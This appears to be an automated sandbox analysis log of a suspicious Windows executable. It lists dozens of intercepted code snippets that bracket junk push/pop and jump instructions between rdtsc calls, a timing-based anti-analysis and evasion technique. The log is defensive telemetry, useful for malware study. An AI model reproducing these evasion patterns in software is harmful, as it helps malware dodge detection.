Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC798 second address: ADC7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jng 00007F0738AFBE58h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jnl 00007F0738AFBE58h 0x00000017 popad 0x00000018 nop 0x00000019 push eax 0x0000001a pop ecx 0x0000001b lea eax, dword ptr [ebp+124830FBh] 0x00000021 or dword ptr [ebp+1244D0A1h], eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b jo 00007F0738AFBE56h 0x00000031 pop edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC7CC second address: ADC7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738B194DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B0F1B5 second address: B0F1B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B0F1B9 second address: B0F1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B0F2F6 second address: B0F32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0738AFBE61h 0x0000000b popad 0x0000000c jmp 00007F0738AFBE67h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jng 00007F0738AFBE56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B0F32F second address: B0F34A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F0738B194E0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B0F34A second address: B0F366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0738AFBE5Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B0F366 second address: B0F38F instructions: 0x00000000 rdtsc 0x00000002 je 00007F0738B194D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F0738B194D6h 0x00000011 jmp 00007F0738B194E4h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B0FBE0 second address: B0FC19 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0738AFBE56h 0x00000008 jmp 00007F0738AFBE64h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0738AFBE68h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B11693 second address: B11699 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B11699 second address: B1169F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B16417 second address: B1641C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1641C second address: B16436 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0738AFBE6Ch 0x00000008 jmp 00007F0738AFBE60h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B16AE8 second address: B16AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B16AEC second address: B16B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0738AFBE5Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B16EEA second address: B16F16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0738B194E6h 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F0738B194D6h 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B16F16 second address: B16F26 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0738AFBE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B16F26 second address: B16F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B17084 second address: B1708A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1708A second address: B1708F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1708F second address: B170AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0738AFBE67h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B170AB second address: B170F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F0738B194E1h 0x0000000b jmp 00007F0738B194E3h 0x00000010 jmp 00007F0738B194E8h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B172B1 second address: B172CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0738AFBE69h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B172CF second address: B172D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1BBDB second address: B1BBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1BBE2 second address: B1BBE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1BBE8 second address: B1BBEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1B4FA second address: B1B506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1B506 second address: B1B50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1B7A6 second address: B1B7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0738B194D6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1DF6E second address: B1DF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1DB37 second address: B1DB3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B1DB3D second address: B1DB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0738AFBE5Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B23688 second address: B2368D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2368D second address: B23699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0738AFBE56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADC18B second address: ADC190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B23C54 second address: B23C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jbe 00007F0738AFBE79h 0x0000000f jmp 00007F0738AFBE62h 0x00000014 jmp 00007F0738AFBE61h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B23C86 second address: B23CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0738B194E5h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B26E7B second address: B26EAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0738AFBE69h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B26EAE second address: B26EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B26EB5 second address: B26EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B26EBD second address: B26EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B27047 second address: B27050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B27050 second address: B27054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B27054 second address: B27058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B27058 second address: B2706A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0738B194D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2706A second address: B2706E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2A7D7 second address: B2A81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jng 00007F0738B194D6h 0x0000000e jmp 00007F0738B194E8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jmp 00007F0738B194E6h 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2A81C second address: B2A825 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2AAD2 second address: B2AAE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0738B194D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2AAE0 second address: B2AAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2AAE4 second address: B2AAEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2AC81 second address: B2AC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2AC8B second address: B2ACA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738B194E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2ACA0 second address: B2ACC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0738AFBE56h 0x0000000e jmp 00007F0738AFBE62h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2ADFB second address: B2ADFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2AF48 second address: B2AF4E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2AF4E second address: B2AF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0738B194E5h 0x0000000b pushad 0x0000000c jnp 00007F0738B194D6h 0x00000012 jnp 00007F0738B194D6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B2AF7A second address: B2AF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F0738AFBE60h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B32A19 second address: B32A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B3335E second address: B33372 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0738AFBE56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0738AFBE56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B33372 second address: B33390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0738B194E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B33390 second address: B33394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B336CA second address: B336D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B33F60 second address: B33F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B33F66 second address: B33F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B33F6A second address: B33F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B345EF second address: B34626 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0738B194E5h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0738B194E7h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B34626 second address: B3462A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B3462A second address: B3463E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0738B194D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F0738B194DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B386C2 second address: B386CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B386CA second address: B386E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0738B194E0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B37939 second address: B37943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B37943 second address: B3794D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B3794D second address: B3795D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0738AFBE5Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B37AA5 second address: B37AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B37AA9 second address: B37AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE63h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B37E98 second address: B37E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B37E9E second address: B37EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B37EBB second address: B37EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0738B194D6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B37EC6 second address: B37ED0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0738AFBE5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B400DD second address: B400ED instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0738B194D6h 0x00000008 jp 00007F0738B194D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B400ED second address: B40102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F0738AFBE56h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B47D9D second address: B47DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B47DA2 second address: B47DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0738AFBE56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B46036 second address: B46075 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0738B194ECh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0738B194E4h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F0738B194D6h 0x0000001a jmp 00007F0738B194E6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B46075 second address: B460A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0738AFBE5Fh 0x0000000e push edi 0x0000000f jg 00007F0738AFBE56h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B463C9 second address: B463CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B463CD second address: B463E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B463E5 second address: B46403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F0738B194D8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B46403 second address: B4640A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B4651C second address: B46536 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0738B194DCh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F0738B194D6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B46816 second address: B4681C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
